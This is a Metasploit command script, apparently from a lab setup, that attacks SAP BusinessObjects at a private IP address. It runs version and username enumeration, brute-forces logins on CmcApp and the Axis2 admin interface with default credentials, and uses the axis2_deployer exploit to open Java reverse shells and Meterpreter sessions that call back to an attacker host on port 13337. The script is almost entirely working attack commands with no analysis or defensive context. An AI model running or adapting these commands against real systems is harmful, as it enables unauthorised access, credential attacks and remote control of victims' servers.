echo "administrator" >> /tmp/users.txt echo "foo" >> /tmp/users.txt echo "bar" >> /tmp/users.txt echo "admin" >> /tmp/users.txt ################################### # Version Detection (dswsbobje) ################################### use scanner/http/sap_businessobjects_version_enum set RHOSTS 192.168.33.128 run ######################################################################################### # Username Enumeration (dswsbobje) # NOTE: # dswsbobje is only the interface used to identify valid credentials for CmcApp. # Credentials will work only for CmcApp not for dswsbobje. ######################################################################################### use scanner/http/sap_businessobjects_user_enum set RHOSTS 192.168.33.128 set USERNAME administrator run use scanner/http/sap_businessobjects_user_enum set RHOSTS 192.168.33.128 set USER_FILE /tmp/users.txt run ######################################################################################### # Username Bruteforce # NOTE: # dswsbobje is only the interface used to verify valid credentials for CmcApp. # Credentials will work only for CmcApp not for dswsbobje. ######################################################################################### use scanner/http/sap_businessobjects_user_brute set RHOSTS 192.168.33.128 set USERNAME administrator set PASSWORD '' run ######################################## # Username Bruteforce (Web) - CmcApp ######################################## use scanner/http/sap_businessobjects_user_brute_web set RHOSTS 192.168.33.128 set USERNAME administrator set PASSWORD '' run ######################################################################## # SAP BusinessObjects Username Bruteforce - Axis2 interface (dswsbobje) ######################################################################## use auxiliary/scanner/http/axis_login set URI /dswsbobje/axis2-admin/login set USERNAME admin set PASSWORD axis2 set RHOSTS 192.168.33.128 run ######################################################################## # SAP BusinessObjects Exploit - Axis2 interface (dswsbobje) ######################################################################## # windows shell use exploit/multi/http/axis2_deployer set PATH /dswsbobje set RHOST 192.168.33.128 set payload java/shell/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j # meterpreter shell use exploit/multi/http/axis2_deployer set PATH /dswsbobje set RHOST 192.168.33.128 set payload java/meterpreter/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j ######################################################## # non-SAP Username Bruteforce - Default Axis2 interface ######################################################## use auxiliary/scanner/http/axis_login set URI /dswsbobje/axis2-admin/login set USERNAME admin set PASSWORD axis2 set RHOSTS 192.168.33.128 run ############################################ # non-SAP exploit / Default Axis2 interface ############################################ use exploit/multi/http/axis2_deployer set PATH /axis2 set RHOST 192.168.33.128 set payload java/shell/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j